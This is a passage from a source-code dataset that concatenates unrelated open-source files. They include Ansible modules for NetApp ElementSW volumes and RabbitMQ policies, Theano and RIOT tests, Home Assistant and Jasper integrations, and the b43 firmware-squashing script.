- If unspecified, the access settings of the clone will be the same as the source.
choices: ['readOnly', 'readWrite', 'locked', 'replicationTarget']
password:
description:
- ElementSW access account password
aliases:
- pass
username:
description:
- ElementSW access account user-name
aliases:
- user
'''
EXAMPLES = """
- name: Create Volume
na_elementsw_volume:
hostname: "{{ elementsw_hostname }}"
username: "{{ elementsw_username }}"
password: "{{ elementsw_password }}"
state: present
name: AnsibleVol
qos: {minIOPS: 1000, maxIOPS: 20000, burstIOPS: 50000}
account_id: 3
enable512e: False
size: 1
size_unit: gb
- name: Update Volume
na_elementsw_volume:
hostname: "{{ elementsw_hostname }}"
username: "{{ elementsw_username }}"
password: "{{ elementsw_password }}"
state: present
name: AnsibleVol
account_id: 3
access: readWrite
- name: Delete Volume
na_elementsw_volume:
hostname: "{{ elementsw_hostname }}"
username: "{{ elementsw_username }}"
password: "{{ elementsw_password }}"
state: absent
name: AnsibleVol
account_id: 2
"""
RETURN = """
msg:
description: Success message
returned: success
type: string
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
from ansible.module_utils.netapp_elementsw_module import NaElementSWModule
HAS_SF_SDK = netapp_utils.has_sf_sdk()
try:
import solidfire.common
except Exception:
HAS_SF_SDK = False
class ElementOSVolume(object):
"""
Contains methods to parse arguments,
derive details of ElementSW objects
and send requests to ElementOS via
the ElementSW SDK
"""
def __init__(self):
"""
Parse arguments, setup state variables,
        check parameters and ensure the SDK is installed
"""
self._size_unit_map = netapp_utils.SF_BYTE_MAP
self.argument_spec = netapp_utils.ontap_sf_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent']),
name=dict(required=True, type='str'),
account_id=dict(required=True),
enable512e=dict(type='bool', aliases=['512emulation']),
qos=dict(required=False, type='dict', default=None),
attributes=dict(required=False, type='dict', default=None),
size=dict(type='int'),
size_unit=dict(default='gb',
choices=['bytes', 'b', 'kb', 'mb', 'gb', 'tb',
'pb', 'eb', 'zb', 'yb'], type='str'),
access=dict(required=False, type='str', default=None, choices=['readOnly', 'readWrite',
'locked', 'replicationTarget']),
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
required_if=[
('state', 'present', ['size', 'enable512e'])
],
supports_check_mode=True
)
param = self.module.params
# set up state variables
self.state = param['state']
self.name = param['name']
self.account_id = param['account_id']
self.enable512e = param['enable512e']
self.qos = param['qos']
self.attributes = param['attributes']
self.access = param['access']
self.size_unit = param['size_unit']
if param['size'] is not None:
self.size = param['size'] * self._size_unit_map[self.size_unit]
else:
self.size = None
if HAS_SF_SDK is False:
self.module.fail_json(msg="Unable to import the ElementSW Python SDK")
else:
try:
self.sfe = netapp_utils.create_sf_connection(module=self.module)
except solidfire.common.ApiServerError:
self.module.fail_json(msg="Unable to create the connection")
self.elementsw_helper = NaElementSWModule(self.sfe)
# add telemetry attributes
if self.attributes is not None:
self.attributes.update(self.elementsw_helper.set_element_attributes(source='na_elementsw_volume'))
else:
self.attributes = self.elementsw_helper.set_element_attributes(source='na_elementsw_volume')
def get_account_id(self):
"""
Return account id if found
"""
try:
# Update and return self.account_id
self.account_id = self.elementsw_helper.account_exists(self.account_id)
return self.account_id
except Exception as err:
self.module.fail_json(msg="Error: account_id %s does not exist" % self.account_id, exception=to_native(err))
def get_volume(self):
"""
Return volume details if found
"""
# Get volume details
volume_id = self.elementsw_helper.volume_exists(self.name, self.account_id)
if volume_id is not None:
# Return volume_details
volume_details = self.elementsw_helper.get_volume(volume_id)
if volume_details is not None:
return volume_details
return None
def create_volume(self):
"""
Create Volume
:return: True if created, False if fails
"""
try:
self.sfe.create_volume(name=self.name,
account_id=self.account_id,
total_size=self.size,
enable512e=self.enable512e,
qos=self.qos,
attributes=self.attributes)
except Exception as err:
self.module.fail_json(msg="Error provisioning volume %s of size %s" % (self.name, self.size),
exception=to_native(err))
def delete_volume(self, volume_id):
"""
Delete and purge the volume using volume id
:return: Success : True , Failed : False
"""
try:
self.sfe.delete_volume(volume_id=volume_id)
self.sfe.purge_deleted_volume(volume_id=volume_id)
# Delete method will delete and also purge the volume instead of moving the volume state to inactive.
except Exception as err:
# Throwing the exact error message instead of generic error message
self.module.fail_json(msg=err.message,
exception=to_native(err))
def update_volume(self, volume_id):
"""
Update the volume with the specified param
:return: Success : True, Failed : False
"""
try:
self.sfe.modify_volume(volume_id,
account_id=self.account_id,
access=self.access,
qos=self.qos,
total_size=self.size,
attributes=self.attributes)
except Exception as err:
# Throwing the exact error message instead of generic error message
self.module.fail_json(msg=err.message,
exception=to_native(err))
def apply(self):
# Perform pre-checks, call functions and exit
changed = False
volume_exists = False
update_volume = False
self.get_account_id()
volume_detail = self.get_volume()
if volume_detail:
volume_exists = True
volume_id = volume_detail.volume_id
if self.state == 'absent':
# Checking for state change(s) here, and applying it later in the code allows us to support
# check_mode
changed = True
elif self.state == 'present':
# Checking all the params for update operation
if volume_detail.access is not None and self.access is not None and volume_detail.access != self.access:
update_volume = True
changed = True
elif volume_detail.account_id is not None and self.account_id is not None \
and volume_detail.account_id != self.account_id:
update_volume = True
changed = True
elif volume_detail.qos is not None and self.qos is not None:
"""
Actual volume_detail.qos has ['burst_iops', 'burst_time', 'curve', 'max_iops', 'min_iops'] keys.
                    As only minIOPS, maxIOPS and burstIOPS are important to consider, we check only these values.
"""
volume_qos = volume_detail.qos.__dict__
if volume_qos['min_iops'] != self.qos['minIOPS'] or volume_qos['max_iops'] != self.qos['maxIOPS'] \
or volume_qos['burst_iops'] != self.qos['burstIOPS']:
update_volume = True
changed = True
else:
# If check fails, do nothing
pass
if volume_detail.total_size is not None and volume_detail.total_size != self.size:
size_difference = abs(float(volume_detail.total_size - self.size))
# Change size only if difference is bigger than 0.001
if size_difference / self.size > 0.001:
update_volume = True
changed = True
else:
# If check fails, do nothing
pass
if volume_detail.attributes is not None and self.attributes is not None and \
volume_detail.attributes != self.attributes:
update_volume = True
changed = True
else:
if self.state == 'present':
changed = True
result_message = ""
if changed:
if self.module.check_mode:
result_message = "Check mode, skipping changes"
else:
if self.state == 'present':
if not volume_exists:
self.create_volume()
result_message = "Volume created"
elif update_volume:
self.update_volume(volume_id)
result_message = "Volume updated"
elif self.state == 'absent':
self.delete_volume(volume_id)
result_message = "Volume deleted"
self.module.exit_json(changed=changed, msg=result_message)
def main():
# Create object and call apply
na_elementsw_volume = ElementOSVolume()
na_elementsw_volume.apply()
if __name__ == '__main__':
main()
| gpl-3.0 |
x3ro/RIOT | tests/eepreg/tests/01-run.py | 30 | 1057 | #!/usr/bin/env python3
# Copyright (C) 2018 Acutam Automation, LLC
#
# This file is subject to the terms and conditions of the GNU Lesser
# General Public License v2.1. See the file LICENSE in the top level
# directory for more details.
import sys
from testrunner import run
def testfunc(child):
child.expect_exact("EEPROM registry (eepreg) test routine")
child.expect_exact("Testing new registry creation: reset check [SUCCESS]")
child.expect_exact("Testing writing and reading entries: add write add read [SUCCESS]")
child.expect_exact("Testing detection of conflicting size: add [SUCCESS]")
child.expect_exact("Testing calculation of lengths: len len [SUCCESS]")
child.expect_exact("Testing of successful data move after rm: rm read data [SUCCESS]")
child.expect_exact("Testing of free space change after write: free add free [SUCCESS]")
child.expect_exact("Testing of iteration over registry: iter bar foo [SUCCESS]")
child.expect_exact("Tests complete!")
if __name__ == "__main__":
sys.exit(run(testfunc))
| lgpl-2.1 |
littlstar/chromium.src | third_party/closure_linter/closure_linter/common/filetestcase.py | 109 | 3893 | #!/usr/bin/env python
# Copyright 2007 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test case that runs a checker on a file, matching errors against annotations.
Runs the given checker on the given file, accumulating all errors. The list
of errors is then matched against those annotated in the file. Based heavily
on devtools/javascript/gpylint/full_test.py.
"""
__author__ = ('[email protected] (Robert Walker)',
'[email protected] (Andy Perelson)')
import re
import unittest as googletest
from closure_linter.common import erroraccumulator
class AnnotatedFileTestCase(googletest.TestCase):
"""Test case to run a linter against a single file."""
  # Matches an all-caps letters + underscores error identifier
_MESSAGE = {'msg': '[A-Z][A-Z_]+'}
# Matches a //, followed by an optional line number with a +/-, followed by a
# list of message IDs. Used to extract expected messages from testdata files.
# TODO(robbyw): Generalize to use different commenting patterns.
_EXPECTED_RE = re.compile(r'\s*//\s*(?:(?P<line>[+-]?[0-9]+):)?'
r'\s*(?P<msgs>%(msg)s(?:,\s*%(msg)s)*)' % _MESSAGE)
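  # For example, a testdata line such as (message ID illustrative):
  #   var x = 1  // +1: MISSING_SEMICOLON
  # declares that the error is expected one line below this comment.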
def __init__(self, filename, lint_callable, converter):
"""Create a single file lint test case.
Args:
filename: Filename to test.
lint_callable: Callable that lints a file. This is usually runner.Run().
converter: Function taking an error string and returning an error code.
"""
googletest.TestCase.__init__(self, 'runTest')
self._filename = filename
self._messages = []
self._lint_callable = lint_callable
self._converter = converter
def shortDescription(self):
"""Provides a description for the test."""
return 'Run linter on %s' % self._filename
def runTest(self):
"""Runs the test."""
try:
filename = self._filename
stream = open(filename)
except IOError as ex:
raise IOError('Could not find testdata resource for %s: %s' %
(self._filename, ex))
expected = self._GetExpectedMessages(stream)
got = self._ProcessFileAndGetMessages(filename)
self.assertEqual(expected, got)
def _GetExpectedMessages(self, stream):
"""Parse a file and get a sorted list of expected messages."""
messages = []
for i, line in enumerate(stream):
match = self._EXPECTED_RE.search(line)
if match:
line = match.group('line')
msg_ids = match.group('msgs')
if line is None:
line = i + 1
elif line.startswith('+') or line.startswith('-'):
line = i + 1 + int(line)
else:
line = int(line)
for msg_id in msg_ids.split(','):
# Ignore a spurious message from the license preamble.
if msg_id != 'WITHOUT':
messages.append((line, self._converter(msg_id.strip())))
stream.seek(0)
messages.sort()
return messages
def _ProcessFileAndGetMessages(self, filename):
"""Trap gjslint's output parse it to get messages added."""
error_accumulator = erroraccumulator.ErrorAccumulator()
self._lint_callable(filename, error_accumulator)
errors = error_accumulator.GetErrors()
# Convert to expected tuple format.
error_msgs = [(error.token.line_number, error.code) for error in errors]
error_msgs.sort()
return error_msgs
| bsd-3-clause |
morphis/home-assistant | homeassistant/components/notify/free_mobile.py | 12 | 1750 | """
Support for the Free Mobile SMS platform.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/notify.free_mobile/
"""
import logging
import voluptuous as vol
from homeassistant.components.notify import (
PLATFORM_SCHEMA, BaseNotificationService)
from homeassistant.const import CONF_ACCESS_TOKEN, CONF_USERNAME
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
REQUIREMENTS = ['freesms==0.1.1']
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_ACCESS_TOKEN): cv.string,
})
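# Example configuration.yaml entry for this platform (values are placeholders):
#
# notify:
#   - platform: free_mobile
#     username: YOUR_FREE_MOBILE_LOGIN
#     access_token: YOUR_FREE_MOBILE_API_KEY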
def get_service(hass, config, discovery_info=None):
"""Get the Free Mobile SMS notification service."""
return FreeSMSNotificationService(config[CONF_USERNAME],
config[CONF_ACCESS_TOKEN])
class FreeSMSNotificationService(BaseNotificationService):
"""Implement a notification service for the Free Mobile SMS service."""
def __init__(self, username, access_token):
"""Initialize the service."""
from freesms import FreeClient
self.free_client = FreeClient(username, access_token)
def send_message(self, message="", **kwargs):
"""Send a message to the Free Mobile user cell."""
resp = self.free_client.send_sms(message)
if resp.status_code == 400:
_LOGGER.error("At least one parameter is missing")
elif resp.status_code == 402:
_LOGGER.error("Too much SMS send in a few time")
elif resp.status_code == 403:
_LOGGER.error("Wrong Username/Password")
elif resp.status_code == 500:
_LOGGER.error("Server error, try later")
| apache-2.0 |
rwth-ti/gr-ofdm | python/ofdm/qa_channel_equalizer_mimo.py | 1 | 1301 | #!/usr/bin/env python
#
# Copyright 2014 Institute for Theoretical Information Technology,
# RWTH Aachen University
# www.ti.rwth-aachen.de
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest
import ofdm_swig as ofdm
class qa_channel_equalizer_mimo (gr_unittest.TestCase):
def setUp (self):
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def test_001_t (self):
# set up fg
self.tb.run ()
# check data
if __name__ == '__main__':
gr_unittest.run(qa_channel_equalizer_mimo, "qa_channel_equalizer_mimo.xml")
| gpl-3.0 |
sunu/jasper-client | client/modules/Notifications.py | 35 | 1743 | # -*- coding: utf-8-*-
import re
import facebook
WORDS = ["FACEBOOK", "NOTIFICATION"]
def handle(text, mic, profile):
"""
Responds to user-input, typically speech text, with a summary of
the user's Facebook notifications, including a count and details
related to each individual notification.
Arguments:
text -- user-input, typically transcribed speech
mic -- used to interact with the user (for both input and output)
profile -- contains information related to the user (e.g., phone
number)
"""
oauth_access_token = profile['keys']['FB_TOKEN']
graph = facebook.GraphAPI(oauth_access_token)
try:
results = graph.request("me/notifications")
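        # results is a Graph API response dict shaped roughly like
        # (contents illustrative):
        #   {"data": [{"title": "Jane commented on your status.", ...}, ...]}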
except facebook.GraphAPIError:
mic.say("I have not been authorized to query your Facebook. If you " +
"would like to check your notifications in the future, " +
"please visit the Jasper dashboard.")
return
    except Exception:
        mic.say(
            "I apologize, there's a problem with that service at the moment.")
        return
if not len(results['data']):
mic.say("You have no Facebook notifications. ")
return
updates = []
for notification in results['data']:
updates.append(notification['title'])
count = len(results['data'])
mic.say("You have " + str(count) +
" Facebook notifications. " + " ".join(updates) + ". ")
return
def isValid(text):
"""
Returns True if the input is related to Facebook notifications.
Arguments:
text -- user-input, typically transcribed speech
"""
return bool(re.search(r'\bnotification|Facebook\b', text, re.IGNORECASE))
| mit |
Weihonghao/ECM | Vpy34/lib/python3.5/site-packages/theano/tensor/tests/test_opt_uncanonicalize.py | 1 | 6708 | from __future__ import absolute_import, print_function, division
import unittest
import numpy
import theano
from theano import function, config
from theano import scalar
from theano.gof import FunctionGraph
from theano.gof.opt import out2in
from theano.tensor.opt_uncanonicalize import (
local_alloc_dimshuffle,
local_reshape_dimshuffle,
local_dimshuffle_alloc,
local_dimshuffle_subtensor,
)
import theano.tensor as tensor
# from theano.tensor import matrix, max_and_argmax, MaxAndArgmax, neg
from theano.tensor.elemwise import CAReduce, Elemwise, DimShuffle
from theano.tests import unittest_tools as utt
class T_max_and_argmax(unittest.TestCase):
def test_optimization(self):
# If we use only the max output, we should replace this op with
# a faster one.
mode = theano.compile.mode.get_default_mode().including(
'canonicalize', 'fast_run')
for axis in [0, 1, -1]:
data = numpy.asarray(numpy.random.rand(2, 3), dtype=config.floatX)
n = tensor.matrix()
f = function([n], tensor.max_and_argmax(n, axis)[0], mode=mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce)
f = function([n], tensor.max_and_argmax(n, axis), mode=mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, tensor.MaxAndArgmax)
class T_min_max(unittest.TestCase):
def setUp(self):
utt.seed_rng()
self.mode = theano.compile.mode.get_default_mode().including(
'canonicalize', 'fast_run')
def test_optimization_max(self):
data = numpy.asarray(numpy.random.rand(2, 3), dtype=config.floatX)
n = tensor.matrix()
for axis in [0, 1, -1]:
f = function([n], tensor.max(n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce)
f(data)
f = function([n], tensor.max(-n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 2
assert isinstance(topo[0].op, Elemwise)
assert isinstance(topo[0].op.scalar_op, scalar.Neg)
assert isinstance(topo[1].op, CAReduce)
f(data)
f = function([n], -tensor.max(n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 2
assert isinstance(topo[0].op, CAReduce)
assert isinstance(topo[1].op, Elemwise)
assert isinstance(topo[1].op.scalar_op, scalar.Neg)
f(data)
f = function([n], -tensor.max(-n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce) # min
f(data)
def test_optimization_min(self):
data = numpy.asarray(numpy.random.rand(2, 3), dtype=config.floatX)
n = tensor.matrix()
for axis in [0, 1, -1]:
f = function([n], tensor.min(n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce)
f(data)
# test variant with neg to make sure we optimize correctly
f = function([n], tensor.min(-n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 2
assert isinstance(topo[0].op, CAReduce) # max
assert isinstance(topo[1].op, Elemwise)
assert isinstance(topo[1].op.scalar_op, scalar.Neg)
f(data)
f = function([n], -tensor.min(n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 2
assert isinstance(topo[0].op, Elemwise)
assert isinstance(topo[0].op.scalar_op, scalar.Neg)
assert isinstance(topo[1].op, CAReduce) # max
f(data)
f = function([n], -tensor.min(-n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce) # max
f(data)
def test_local_alloc_dimshuffle():
alloc_dimshuffle = out2in(local_alloc_dimshuffle)
x = tensor.vector('x')
m = tensor.iscalar('m')
y = x.dimshuffle('x', 0)
out = tensor.alloc(y, m, 1, x.shape[0])
g = FunctionGraph([x, m], [out])
alloc_dimshuffle(g)
topo = g.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
def test_local_reshape_dimshuffle():
reshape_dimshuffle = out2in(local_reshape_dimshuffle)
x = tensor.matrix('x')
y = x.dimshuffle('x', 0, 'x', 1)
out = tensor.reshape(y, (1, x.shape[0] * x.shape[1], 1))
g = FunctionGraph([x], [out])
reshape_dimshuffle(g)
topo = g.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
def test_local_dimshuffle_alloc():
reshape_dimshuffle = out2in(local_dimshuffle_alloc)
x = tensor.vector('x')
out = tensor.alloc(x, 3, 2).dimshuffle('x', 'x', 0, 1)
g = FunctionGraph([x], [out])
reshape_dimshuffle(g)
l = theano.gof.PerformLinker()
l.accept(g)
f = l.make_function()
assert f([3, 4]).ndim == 4
topo = g.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
def test_local_dimshuffle_subtensor():
dimshuffle_subtensor = out2in(local_dimshuffle_subtensor)
x = tensor.dtensor4('x')
x = tensor.patternbroadcast(x, (False, True, False, False))
i = tensor.iscalar('i')
out = x[:, :, 10:30, ::i].dimshuffle(0, 2, 3)
g = FunctionGraph([x, i], [out])
dimshuffle_subtensor(g)
topo = g.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
# Test dimshuffle remove dimensions the subtensor don't "see".
x = tensor.tensor(broadcastable=(False, True, False), dtype='float64')
out = x[i].dimshuffle(1)
g = FunctionGraph([x, i], [out])
dimshuffle_subtensor(g)
topo = g.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
# Test dimshuffle remove dimensions the subtensor don't "see" but
# have in between dimensions.
x = tensor.tensor(broadcastable=(False, True, False, True),
dtype='float64')
out = x[i].dimshuffle(1)
f = theano.function([x, i], out)
topo = f.maker.fgraph.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
assert f(numpy.random.rand(5, 1, 4, 1), 2).shape == (4,)
| agpl-3.0 |
Kast0rTr0y/ansible | lib/ansible/modules/messaging/rabbitmq_policy.py | 25 | 5071 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, John Dewey <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: rabbitmq_policy
short_description: Manage the state of policies in RabbitMQ.
description:
- Manage the state of a virtual host in RabbitMQ.
version_added: "1.5"
author: "John Dewey (@retr0h)"
options:
name:
description:
- The name of the policy to manage.
required: true
default: null
vhost:
description:
- The name of the vhost to apply to.
required: false
default: /
apply_to:
description:
- What the policy applies to. Requires RabbitMQ 3.2.0 or later.
required: false
default: all
choices: [all, exchanges, queues]
version_added: "2.1"
pattern:
description:
- A regex of queues to apply the policy to.
required: true
default: null
tags:
description:
- A dict or string describing the policy.
required: true
default: null
priority:
description:
- The priority of the policy.
required: false
default: 0
node:
description:
- Erlang node name of the rabbit we wish to configure.
required: false
default: rabbit
state:
description:
- The state of the policy.
default: present
choices: [present, absent]
'''
EXAMPLES = '''
- name: ensure the default vhost contains the HA policy via a dict
rabbitmq_policy:
name: HA
pattern: .*
args:
tags:
ha-mode: all
- name: ensure the default vhost contains the HA policy
rabbitmq_policy:
name: HA
pattern: .*
tags:
ha-mode: all
'''
class RabbitMqPolicy(object):
def __init__(self, module, name):
self._module = module
self._name = name
self._vhost = module.params['vhost']
self._pattern = module.params['pattern']
self._apply_to = module.params['apply_to']
self._tags = module.params['tags']
self._priority = module.params['priority']
self._node = module.params['node']
self._rabbitmqctl = module.get_bin_path('rabbitmqctl', True)
def _exec(self, args, run_in_check_mode=False):
        if not self._module.check_mode or run_in_check_mode:
cmd = [self._rabbitmqctl, '-q', '-n', self._node]
args.insert(1, '-p')
args.insert(2, self._vhost)
rc, out, err = self._module.run_command(cmd + args, check_rc=True)
return out.splitlines()
return list()
def list(self):
policies = self._exec(['list_policies'], True)
for policy in policies:
policy_name = policy.split('\t')[1]
if policy_name == self._name:
return True
return False
def set(self):
import json
args = ['set_policy']
args.append(self._name)
args.append(self._pattern)
args.append(json.dumps(self._tags))
args.append('--priority')
args.append(self._priority)
if (self._apply_to != 'all'):
args.append('--apply-to')
args.append(self._apply_to)
return self._exec(args)
def clear(self):
return self._exec(['clear_policy', self._name])
def main():
arg_spec = dict(
name=dict(required=True),
vhost=dict(default='/'),
pattern=dict(required=True),
apply_to=dict(default='all', choices=['all', 'exchanges', 'queues']),
tags=dict(type='dict', required=True),
priority=dict(default='0'),
node=dict(default='rabbit'),
state=dict(default='present', choices=['present', 'absent']),
)
module = AnsibleModule(
argument_spec=arg_spec,
supports_check_mode=True
)
name = module.params['name']
state = module.params['state']
rabbitmq_policy = RabbitMqPolicy(module, name)
changed = False
if rabbitmq_policy.list():
if state == 'absent':
rabbitmq_policy.clear()
changed = True
else:
changed = False
elif state == 'present':
rabbitmq_policy.set()
changed = True
module.exit_json(changed=changed, name=name, state=state)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| gpl-3.0 |
greedymouse/openwrt | tools/b43-tools/files/b43-fwsquash.py | 494 | 4767 | #!/usr/bin/env python
#
# b43 firmware file squasher
# Removes unnecessary firmware files
#
# Copyright (c) 2009 Michael Buesch <[email protected]>
#
# Licensed under the GNU/GPL version 2 or (at your option) any later version.
#
import sys
import os
def usage():
print("Usage: %s PHYTYPES COREREVS /path/to/extracted/firmware" % sys.argv[0])
print("")
print("PHYTYPES is a comma separated list of:")
print("A => A-PHY")
print("AG => Dual A-PHY G-PHY")
print("G => G-PHY")
print("LP => LP-PHY")
print("N => N-PHY")
print("HT => HT-PHY")
print("LCN => LCN-PHY")
print("LCN40 => LCN40-PHY")
print("AC => AC-PHY")
print("")
print("COREREVS is a comma separated list of core revision numbers.")
if len(sys.argv) != 4:
usage()
sys.exit(1)
phytypes = sys.argv[1]
corerevs = sys.argv[2]
fwpath = sys.argv[3]
phytypes = phytypes.split(',')
try:
	corerevs = [int(r) for r in corerevs.split(',')]
except ValueError:
print("ERROR: \"%s\" is not a valid COREREVS string\n" % corerevs)
usage()
sys.exit(1)
fwfiles = os.listdir(fwpath)
fwfiles = [fname for fname in fwfiles if fname.endswith(".fw")]
if not fwfiles:
print("ERROR: No firmware files found in %s" % fwpath)
sys.exit(1)
required_fwfiles = []
def revs_match(revs_a, revs_b):
for rev in revs_a:
if rev in revs_b:
return True
return False
def phytypes_match(types_a, types_b):
for type in types_a:
type = type.strip().upper()
if type in types_b:
return True
return False
revmapping = {
"ucode2.fw" : ( (2,3,), ("G",), ),
"ucode4.fw" : ( (4,), ("G",), ),
"ucode5.fw" : ( (5,6,7,8,9,10,), ("G","A","AG",), ),
"ucode11.fw" : ( (11,12,), ("N",), ),
"ucode13.fw" : ( (13,), ("LP","G",), ),
"ucode14.fw" : ( (14,), ("LP",), ),
"ucode15.fw" : ( (15,), ("LP",), ),
"ucode16_mimo.fw" : ( (16,17,18,19,23,), ("N",), ),
# "ucode16_lp.fw" : ( (16,17,18,19,), ("LP",), ),
"ucode24_lcn.fw" : ( (24,), ("LCN",), ),
"ucode25_mimo.fw" : ( (25,28,), ("N",), ),
"ucode25_lcn.fw" : ( (25,28,), ("LCN",), ),
"ucode26_mimo.fw" : ( (26,), ("HT",), ),
"ucode29_mimo.fw" : ( (29,), ("HT",), ),
"ucode30_mimo.fw" : ( (30,), ("N",), ),
"ucode33_lcn40.fw" : ( (33,), ("LCN40",), ),
"ucode40.fw" : ( (40,), ("AC",), ),
"ucode42.fw" : ( (42,), ("AC",), ),
"pcm4.fw" : ( (1,2,3,4,), ("G",), ),
"pcm5.fw" : ( (5,6,7,8,9,10,), ("G","A","AG",), ),
}
initvalmapping = {
"a0g1initvals5.fw" : ( (5,6,7,8,9,10,), ("AG",), ),
"a0g0initvals5.fw" : ( (5,6,7,8,9,10,), ("A", "AG",), ),
"b0g0initvals2.fw" : ( (2,4,), ("G",), ),
"b0g0initvals5.fw" : ( (5,6,7,8,9,10,), ("G",), ),
"b0g0initvals13.fw" : ( (13,), ("G",), ),
"n0initvals11.fw" : ( (11,12,), ("N",), ),
"n0initvals16.fw" : ( (16,17,18,23,), ("N",), ),
"n0initvals24.fw" : ( (24,), ("N",), ),
"n0initvals25.fw" : ( (25,28,), ("N",), ),
"n16initvals30.fw" : ( (30,), ("N",), ),
"lp0initvals13.fw" : ( (13,), ("LP",), ),
"lp0initvals14.fw" : ( (14,), ("LP",), ),
"lp0initvals15.fw" : ( (15,), ("LP",), ),
# "lp0initvals16.fw" : ( (16,17,18,), ("LP",), ),
"lcn0initvals24.fw" : ( (24,), ("LCN",), ),
"ht0initvals26.fw" : ( (26,), ("HT",), ),
"ht0initvals29.fw" : ( (29,), ("HT",), ),
"lcn400initvals33.fw" : ( (33,), ("LCN40",), ),
"ac0initvals40.fw" : ( (40,), ("AC",), ),
"ac1initvals42.fw" : ( (42,), ("AC",), ),
"a0g1bsinitvals5.fw" : ( (5,6,7,8,9,10,), ("AG",), ),
"a0g0bsinitvals5.fw" : ( (5,6,7,8,9,10,), ("A", "AG"), ),
"b0g0bsinitvals5.fw" : ( (5,6,7,8,9,10,), ("G",), ),
"n0bsinitvals11.fw" : ( (11,12,), ("N",), ),
"n0bsinitvals16.fw" : ( (16,17,18,23,), ("N",), ),
"n0bsinitvals24.fw" : ( (24,), ("N",), ),
"n0bsinitvals25.fw" : ( (25,28,), ("N",), ),
"n16bsinitvals30.fw" : ( (30,), ("N",), ),
"lp0bsinitvals13.fw" : ( (13,), ("LP",), ),
"lp0bsinitvals14.fw" : ( (14,), ("LP",), ),
"lp0bsinitvals15.fw" : ( (15,), ("LP",), ),
# "lp0bsinitvals16.fw" : ( (16,17,18,), ("LP",), ),
"lcn0bsinitvals24.fw" : ( (24,), ("LCN",), ),
"ht0bsinitvals26.fw" : ( (26,), ("HT",), ),
"ht0bsinitvals29.fw" : ( (29,), ("HT",), ),
"lcn400bsinitvals33.fw" : ( (33,), ("LCN40",), ),
"ac0bsinitvals40.fw" : ( (40,), ("AC",), ),
"ac1bsinitvals42.fw" : ( (42,), ("AC",), ),
}
for f in fwfiles:
if f in revmapping:
if revs_match(corerevs, revmapping[f][0]) and\
phytypes_match(phytypes, revmapping[f][1]):
required_fwfiles += [f]
continue
if f in initvalmapping:
if revs_match(corerevs, initvalmapping[f][0]) and\
phytypes_match(phytypes, initvalmapping[f][1]):
required_fwfiles += [f]
continue
print("WARNING: Firmware file %s not found in the mapping lists" % f)
for f in fwfiles:
if f not in required_fwfiles:
print("Deleting %s" % f)
os.unlink(fwpath + '/' + f)
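# Illustrative invocation (paths and values are examples): keep only the
# firmware needed for G- and N-PHY devices with core revisions 16 and 25:
#   ./b43-fwsquash.py G,N 16,25 /lib/firmware/b43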
| gpl-2.0 |
philotas/enigma2 | lib/python/Components/Converter/ChannelNumbers.py | 42 | 1835 | from Components.NimManager import nimmanager
class ChannelNumbers:
def __init__(self):
pass
def getChannelNumber(self, frequency, nim):
f = int(self.getMHz(frequency))
descr = self.getTunerDescription(nim)
if "Europe" in descr:
if "DVB-T" in descr:
if 174 < f < 230: # III
